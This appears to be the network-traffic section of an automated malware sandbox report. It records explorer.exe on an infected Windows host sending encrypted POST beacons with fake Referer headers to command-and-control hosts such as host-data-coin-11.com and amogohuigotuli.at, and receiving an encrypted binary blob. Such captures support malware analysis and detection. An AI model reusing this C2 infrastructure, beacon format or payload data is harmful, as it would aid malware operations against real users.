Jan 9, 2022 18:48:08.845242023 CET	2980	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qsvaicgadh.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 326 Host: host-data-coin-11.com
Jan 9, 2022 18:48:08.845254898 CET	2980	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 8f 66 5d 02 c9 a1 c1 64 13 d1 b6 2c Data Ascii: i;G~CE5i[nwmFu$f]d,Y4y7[m#^:p]n>7}<=/o@+0yVh`i$OciVJ&Pfe 7\s23NL8K$B`v~IvH vGwF5`\
Jan 9, 2022 18:48:09.401002884 CET	2981	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:09 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49876	67.199.248.14	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.2.3	49809	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:09.620866060 CET	2983	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ykuckxuei.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 315 Host: host-data-coin-11.com
Jan 9, 2022 18:48:09.620888948 CET	2983	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8c 66 5d 02 c8 a1 c1 64 34 a0 d2 1a Data Ascii: i;G~CE5i[nwmFu$f]d4\~pZl)N"'a@!Y!)T3IO# ~<ca#j Q%=ZVP/s+i&{4-6_G+b67ple:m7Lq?*H"
Jan 9, 2022 18:48:10.191782951 CET	3667	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:10 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.2.3	49815	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:11.680984020 CET	10797	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wider.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 258 Host: host-data-coin-11.com
Jan 9, 2022 18:48:11.683479071 CET	10797	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8d 66 5d 02 c8 a1 c1 64 54 9b c1 0a Data Ascii: i;G~CE5i[nwmFu$f]dTU"ssOuvxb"3d}mO}l8PT?%#<Lokq<gfJ"!EB,qB=nP`wGnf;.j';aCjp.aw)xt\S
Jan 9, 2022 18:48:12.231008053 CET	10798	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:12 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 36 34 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad 9f 1c 4f 8e 84 42 09 25 16 f9 b5 8f bd b8 15 a5 0c ce 2c b4 59 52 db 04 e5 fd 28 e3 22 58 1b b2 ed cf 00 b4 53 d1 42 d4 ff 26 85 21 ec ac 96 51 28 e2 b1 49 2d e3 b3 b7 60 fb 9a b5 5d ae 7c 96 ca 31 4a 59 3a 0e 43 dd bb 41 a7 f7 5e 9e ba dd 42 c6 36 9d 0d 0a 30 0d 0a 0d 0a Data Ascii: 64I:82OB%,YR("XSB&!Q(I-`]\|1JY:CA^B60

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.2.3	49817	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:14.917591095 CET	11350	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dajmdg.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 111 Host: host-data-coin-11.com
Jan 9, 2022 18:48:14.917614937 CET	11350	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 8d 66 5d 02 c9 a1 c1 64 5f b3 af 01 Data Ascii: i;G~CE5i[nwmFu$f]d_6IzPo2AngJh
Jan 9, 2022 18:48:15.474877119 CET	11351	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:15 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
33	192.168.2.3	49818	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:15.721410990 CET	11352	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://homleb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 194 Host: host-data-coin-11.com
Jan 9, 2022 18:48:15.721590996 CET	11352	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8a 66 5d 02 c8 a1 c1 64 4b 8a 86 13 Data Ascii: i;G~CE5i[nwmFu$f]dK6Y!-t746DKf&4\|(HWR%{f2/&^O:S'CO66_P2mZjl'
Jan 9, 2022 18:48:16.276000023 CET	11353	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
34	192.168.2.3	49819	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:16.489274979 CET	11353	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://riqrjly.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 202 Host: host-data-coin-11.com
Jan 9, 2022 18:48:16.489496946 CET	11354	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 8b 66 5d 02 c8 a1 c1 64 03 b3 cc 71 Data Ascii: i;G~CE5i[nwmFu$f]dqMw0i4i[#JoEXyxcu*-_XB'r\|JEH=,LdB<[:t)8a#\|%Z{P@M
Jan 9, 2022 18:48:17.059037924 CET	11354	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 32 63 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 1e 49 3a 44 a6 e8 de ea e4 40 fd 45 91 6e b8 57 5b 91 17 bf ec 31 e5 0d 0a 30 0d 0a 0d 0a Data Ascii: 2cI:82OI:D@EnW[10

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
35	192.168.2.3	49842	211.169.6.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:23.340739965 CET	11980	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://irljurmqm.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 352 Host: amogohuigotuli.at
Jan 9, 2022 18:48:23.340749025 CET	11980	OUT	Data Raw: 4a 9d 8d c5 4c 64 59 27 59 01 57 56 0f af 22 ba 2c 1b e9 1b f9 1e d7 dc b1 6a a3 80 75 83 a3 95 89 ab 8f c2 7c 44 e1 c5 a3 2e 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 83 c4 51 a6 Data Ascii: JLdY'YWV",ju\|D.jp_S61oJf=B!bOQh2f;Zoo:zW=W%h,gt-O&6MVF0\|r<ykJ-%tA/gzDE2+&/b]#-peu>4[
Jan 9, 2022 18:48:24.632983923 CET	11983	IN	HTTP/1.0 404 Not Found Date: Sun, 09 Jan 2022 17:48:23 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 18 00 00 00 1d 3d 5d a8 37 66 30 7c 67 57 e9 d9 8c f4 ed 35 70 40 c7 45 89 07 85 a3 00 37 ca 03 00 34 6f 8a 38 01 00 00 00 02 00 9c 03 00 00 36 ca de 68 ff 0e 14 5e eb ce d0 97 22 0a 10 00 09 f9 19 2a 44 f3 20 56 f7 ef 64 ee 7c 39 63 f9 c0 d8 20 a4 a2 40 6c 20 36 59 c7 1e 12 7a 10 7e 06 fd 43 f2 27 d4 f9 ca 28 56 54 dc 7b 5a f9 80 e3 cd 4c 40 23 26 5f 71 59 24 31 19 fe 3a 62 72 93 f0 cf ad d2 57 21 c2 1c 2f 21 ff f8 52 bc 61 dd b9 57 73 57 d9 19 62 05 1e 02 34 12 3b cc 83 67 8a 20 4b 0f 83 6a cf 7d 0d e7 9b de c8 86 cd b2 26 17 a0 bb 4d 48 aa 88 d4 f5 e2 ec f4 25 ab 86 cc c6 a7 1d 76 4f 01 32 ed 8e b9 db e9 d8 8f b9 de b5 8a bc 61 78 72 e3 87 6e 95 25 b0 57 fe 29 98 22 64 7c 99 66 dd 70 15 95 45 52 1c 51 33 4b 62 05 37 11 96 18 7c 30 f0 ae 07 f0 55 26 e8 69 18 07 ab 88 ea af 87 78 ff 67 4f 40 a7 8d 99 07 90 fb ef a1 90 c5 ac 58 31 3d 11 f1 56 9e 5b bb 2c 0a 06 c1 2e ff c9 7b 1f a8 47 87 d6 1f e9 fb 03 50 79 f1 7a 97 cd 14 66 66 00 b2 f4 fb 17 31 78 f4 a7 ec ae 87 d8 e2 13 51 20 d2 9c e3 70 5b 99 39 10 7b ea 2a a1 b4 16 84 d6 ef 5a bd 46 c2 b4 8b d4 fd 77 e1 fa ca 2e 9f 9e 7e b2 d3 0b 53 c6 c2 d7 23 56 ba c5 dd c6 18 30 5e ad 6e f0 95 00 e5 71 fb c1 90 53 08 62 70 57 4b d1 a0 86 d7 1e e1 d0 25 6f 46 bb 66 35 ee d4 d9 d2 39 93 54 b0 46 4a 5c 81 f3 40 e4 ef 9b 43 bb 5f 66 91 93 df 62 39 cc 1d 3f d2 85 7e 29 82 88 b1 62 19 aa 65 35 0f ce 95 66 8a 9e 66 2e 0a 0b 56 70 ae 89 85 da b1 00 1f a5 30 29 6f 8f 83 7f b7 bf c4 57 f7 49 5b 99 b3 6c d3 b4 bb e9 34 81 53 c5 cc 83 f9 98 9b e2 3e fe ed 4f 1d a0 fd f6 23 6c 4a b0 b0 0d 4e 59 15 67 dc de 05 3f 61 d1 c0 5c 15 0e 15 7e b6 40 d0 2d a1 91 58 51 58 46 0a 90 9d 6a bd 10 0a ad 74 dd cc 2b 04 a9 30 e2 00 f0 a4 d5 f5 8d f9 c6 9e 76 80 13 70 cf e8 d0 d4 56 0f 68 f4 47 f9 94 5d 3b dd b9 0f 3c 58 2a 45 d1 36 86 c9 d7 93 fb 93 c6 34 44 bc 7c 65 82 9f 24 cf 71 92 d4 41 c4 06 ad 13 a6 df 25 5a c9 80 08 47 4d 57 21 e7 66 85 91 3c 49 55 10 10 33 d9 7e 3f 00 38 33 78 9f 58 e4 cc aa 5b 40 0f c2 6a 26 bd 89 65 61 87 eb 3d ed fb 7a 50 ff 50 c4 0f 1a a0 21 10 05 84 92 31 2a 57 13 b5 78 c4 26 33 9f 62 22 72 0f b7 79 53 0a 4a 8b d0 39 94 75 24 ef 66 c0 9c 4d e8 f8 63 8f 29 d1 77 9b dd 71 63 4f 50 df 46 4a 72 39 70 46 f0 70 16 4e eb b9 5c dd fa ab f2 fd a4 fc 10 77 c3 ef 94 b5 2f 57 37 98 5e f1 c5 55 72 d1 00 90 29 d0 b8 01 77 2b 8e 6f b2 1f 2d a4 db 90 3e aa b3 36 e5 ba 36 ee 9d 08 fc cb 5e 03 a6 0f 30 c8 b1 2b 05 1a 7f 0e f4 5a ec 49 75 0c 14 e5 b6 b1 ca 95 d8 8e 88 77 b0 48 6b bb ae dc bb 29 5f 5c 78 65 1c 6b ee 14 8c 16 e4 42 3f f0 19 9d 54 06 3f 42 52 66 52 3e 6f 13 ad f4 3b 4a b1 32 fd bd d7 57 3b c3 59 6f a6 cc 96 81 56 fb d9 df 5d bf f0 84 c5 1d 3e bd d7 61 03 3f 68 0b 2e 3f 64 2a 7e 6c 6a 96 da 34 56 16 5c 14 3f 3a b7 1a 2a c6 82 06 62 7c 6f bc c6 ac 65 54 f0 6d 4b fc 6b fb ba 7d 0d 1c bc ba 5d 4f 61 9a 3e bb 1a ea dc f6 49 a9 d5 90 39 d7 58 46 94 40 59 fe 5d 2f 25 e4 ab 04 92 83 50 bd b5 3f d9 b6 3d e2 3b 0b a1 de 92 dd a2 a0 ab 5c 53 7e 1d 07 bd 96 fa 8f 90 07 8a ce 82 7f d4 0d 03 9f bc ad fb 41 e4 22 68 ff 49 03 2d 0d 61 01 41 2d 7c 4c a5 05 c3 a8 06 15 1c ed 00 f5 e7 8e 40 57 3e 14 d8 41 09 cc bb c0 7f db d6 88 1a e6 25 60 91 5e fc 9c ba 56 b4 28 25 0d a6 cc 34 53 66 8f 8c 5f ee 08 04 84 36 84 31 33 d2 c7 22 ca 6b 33 ba 41 87 88 eb 52 6e 0a 50 38 14 aa e3 45 f1 74 e6 91 5a 1a a8 97 a1 59 c7 36 06 4d e0 6c ba 69 c5 4a 93 d1 61 5c 69 e5 e3 c5 d8 b6 4b 92 36 a5 b4 f0 27 74 29 d2 6d 06 51 0a 66 f2 62 ee de 1f ce 21 de 1d 69 f2 0d 47 a0 00 16 9c 17 d8 Data Ascii: =]7f0\|gW5p@E74o86h^"D Vd\|9c @l 6Yz~C'(VT{ZL@#&_qY$1:brW!/!RaWsWb4;g Kj}&MH%vO2axrn%W)"d\|fpERQ3Kb7\|0U&ixgO@X1=V[,.{GPyzff1xQ p[9{ZFw.~S#V0^nqSbpWK%oFf59TFJ\@C_fb9?~)be5ff.Vp0)oWI[l4S>O#lJNYg?a\~@-XQXFjt+0vpVhG];<XE64D\|e$qA%ZGMW!f<IU3~?83xX[@j&ea=zPP!1Wx&3b"rySJ9u$fMc)wqcOPFJr9pFpN\w/W7^Ur)w+o->66^0+ZIuwHk)_\xekB?T?BRfR>o;J2W;YoV]>a?h.?d~lj4V\?:b\|oeTmKk}]Oa>I9XF@Y]/%P?=;\S~A"hI-aA-\|L@W>A%`^V(%4Sf_613"k3ARnP8EtZY6MliJa\iK6't)mQfb!iG
Jan 9, 2022 18:48:24.633043051 CET	11985	IN	Data Raw: f2 9b e4 c8 4f 38 2f 6c e4 3d 45 ef 4e 17 5b 94 e4 b2 c2 fb 11 5b f5 e1 ed cb 63 39 3d 23 3a e5 8f ad 47 ee 84 75 63 7e 4b 11 48 93 2a 44 ed 04 a4 8f 4a d4 a0 2b 7f 04 ce 50 60 ac 95 4b 39 f6 2d 33 03 58 6f 61 10 eb fd d7 ec 21 b5 45 3e 7b 62 da Data Ascii: O8/l=EN[[c9=#:Guc~KHDJ+P`K9-3Xoa!E>{bUV3<``&:~[1lEw3ch'By NDd^w.Q&6zYRD;zu`dvcprTD4=)xI0_^8SFEijBw
Jan 9, 2022 18:48:24.881237984 CET	11986	IN	Data Raw: 2d cd 38 35 5f 21 a8 8e a3 32 fe b5 32 57 04 e1 b1 de bb 93 f5 6e ba 85 65 d2 12 e4 da 8e 44 a0 f7 03 0f 5e 08 12 d5 f2 19 d5 35 62 f6 7a d2 3f fd 97 f2 f5 36 4f de dd 48 fd f3 9e 82 41 f0 e6 48 20 12 a1 99 ac e3 3d a4 19 0a 01 8a a3 b0 18 57 83 Data Ascii: -85_!22WneD^5bz?6OHAH =WfT>_K!56'uFX}ySW@xB<s7;$Y?D*G>lo\|j}) B[ l},v[v:_2Sc_Te
Jan 9, 2022 18:48:24.881300926 CET	11988	IN	Data Raw: 6f c7 59 08 ff 61 70 da 7f 0e 55 38 cd b6 88 91 29 52 88 07 d6 47 87 69 69 bd d8 91 64 d1 91 0d 7a c4 d4 3c a4 26 57 3d 9d ac 9a 38 5f a5 9b 52 fd 77 8d 87 d3 d7 08 9f 87 dc a3 15 69 89 ca 9b e3 88 9b 59 a8 17 65 75 8e 3a 43 9a ed 99 52 9e 64 12 Data Ascii: oYapU8)RGiidz<&W=8_RwiYeu:CRdC9Y2.@f&^][f8Z@= .)$etM\|_G>)%48=vb6Ra=v=`$kT3`@ao]_Q0G"11';{dw
Jan 9, 2022 18:48:24.881340027 CET	11989	IN	Data Raw: 82 7c 2e 2e b5 99 58 24 f5 9c ef a1 8d 0e 3f 34 b3 a2 b6 6a 20 dd 48 94 40 c2 86 2b 6e 0d 4c 80 bc 11 b3 9a 36 09 53 c3 9d b1 72 96 4e d5 b0 3c af 6d 75 ba f5 98 0d 96 16 4d 5a 82 ca bc ad 8c 2a 09 f6 33 f9 a9 5f 15 92 88 fa d7 ca a2 26 55 8e c7 Data Ascii: \|..X$?4j H@+nL6SrN<muMZ*3_&UlK3,wdbKEMP>f8+dT(&kiTxKgVKfC5:x34kQ+9fm7@n)oH/O4U#x_o-'W"<G?KU'f
Jan 9, 2022 18:48:24.881381035 CET	11990	IN	Data Raw: da 8f 62 6d 10 a3 58 a9 6a 93 68 e6 cc c3 b4 45 a9 f1 32 86 5f 2e 0e 23 65 75 85 87 76 a1 9f 3a 01 77 7f 2b cf ae 11 c0 ae df f2 8c be ee 52 53 9e 18 c9 cb 91 7b d5 02 18 e3 91 34 df 1d 00 20 70 48 f5 63 f0 54 aa 74 c9 bb 26 78 a1 b4 90 63 e1 6b Data Ascii: bmXjhE2_.#euv:w+RS{4 pHcTt&xck#Cqwz`Xzs NR11^^1\|.@lQjK9.'g4{}bBY\|Ns&,B5!F\|We3W8lVZ}\?!ei
Jan 9, 2022 18:48:25.129576921 CET	11992	IN	Data Raw: f9 69 55 d0 5a af 80 67 b3 4c 6e 99 89 a3 7e a2 2d 94 bd 66 3f 05 1b 64 14 81 a0 02 13 6d b7 22 1f 92 3e 18 03 fa c0 35 92 8f eb 26 79 ea be df e2 a9 64 b4 c2 98 14 d1 28 b1 ee 36 c5 55 7c ed ad 81 8b 9e d5 08 61 20 e0 8f 97 4c 8c ae c2 68 54 a7 Data Ascii: iUZgLn~-f?dm">5&yd(6U\|a LhT@Zp+PAm.y5%\|Cp8y(kMKGoMb-~n[uu`X5 ah`BR=6fMjO!X:joa=3}*
Jan 9, 2022 18:48:25.129641056 CET	11993	IN	Data Raw: df 53 03 98 cb 92 7b aa fc 39 98 06 cf 69 82 fb cd d8 e3 30 6a 66 5d a9 69 9f 58 6c 1a f9 00 4a 8d 5a 8d 06 7e 41 5f 3a 30 f3 83 9a 18 44 fb 10 88 ad 7f 30 d3 a1 76 11 1a 7b fe 60 d5 b5 12 ff a0 c7 df 6f 8f 20 cd 1d e3 cd 3f 0e 92 31 e2 c1 50 3a Data Ascii: S{9i0jf]iXlJZ~A_:0D0v{`o ?1P:`k eTjNVM$=f0ZPZg.S3>n+~a7b.iHzwJq`VoY~4q]J(i7Wb0zP2NKoz\
Jan 9, 2022 18:48:25.129684925 CET	11995	IN	Data Raw: 69 6d 2d ca c3 35 66 c9 09 bd 14 94 17 b3 89 32 bc 31 c9 5a 29 cd eb 74 32 47 c0 1a 8e 69 54 14 a7 95 03 71 17 94 1c 1e da 35 8b 5d f6 5b 2b 7c a0 9a 2b 1f 0a da 63 3b e1 17 6c 44 c9 f1 d2 dd e8 1c 36 f3 6a c5 7c 6e ef 6e 85 39 75 b9 20 af 8e 2d Data Ascii: im-5f21Z)t2GiTq5][+\|+c;lD6j\|nn9u -C#+/.(XNXPjM)R6NX=Qy3aUf"B%OH"H{\Wd~j:71V"x/Xn]`'!ovy&3
